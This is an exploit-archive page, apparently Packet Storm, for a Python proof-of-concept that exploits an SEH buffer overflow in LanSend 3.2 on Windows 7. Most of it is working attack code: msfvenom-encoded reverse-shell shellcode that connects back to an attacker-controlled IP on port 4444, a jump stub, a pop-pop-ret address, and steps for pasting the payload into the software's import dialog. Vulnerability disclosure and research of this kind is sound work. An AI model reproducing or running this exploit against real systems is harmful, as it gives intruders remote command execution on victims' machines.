exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

LanSend 3.2 Buffer Overflow

LanSend 3.2 Buffer Overflow
Posted May 12, 2020
Authored by gurbanli

LanSend version 3.2 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | aea9ad2b46bc92ead403dc4a49108f5c7b285ef6a058e44d905615a2e913ba0f

LanSend 3.2 Buffer Overflow

Change Mirror Download
# Exploit Title: LanSend 3.2 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-12
# Vulnerable Software: LanSend 3.2
# Vendor Homepage: https://lizardsystems.com
# Version: 3.2
# Software Link: https://lizardsystems.com/download/lansend_setup.exe
# Tested on: Windows 7 x86

f = file('payload.txt','w')

"""
PoC
1. Run exploit
2. Run Lansend and Click Add Computers Wizard
3. Choose import computers from file
4. Copy/paste payload.txt content into filename section
5. shellcode will be executed

"""

"""
msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
"""

shellcode = b""
shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf"
shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17"
shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b"
shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa"
shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89"
shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92"
shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c"
shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1"
shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9"
shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae"
shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01"
shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7"
shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b"
shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59"
shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a"
shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a"
shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6"
shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14"
shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98"
shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda"
shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32"
shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc"
shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75"
shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52"
shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b"
shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8"
shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a"
shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b"
shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f"
shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e"
shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c"
shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7"

"""
047FFF09 59 POP ECX
047FFF0A 59 POP ECX
047FFF0B 80C1 64 ADD CL,64
047FFF0E ^FFE1 JMP ECX
"""
jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1'

"""ppr 00417a47"""

payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x47\x7a\x41'
f.write(payload)
f.close()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close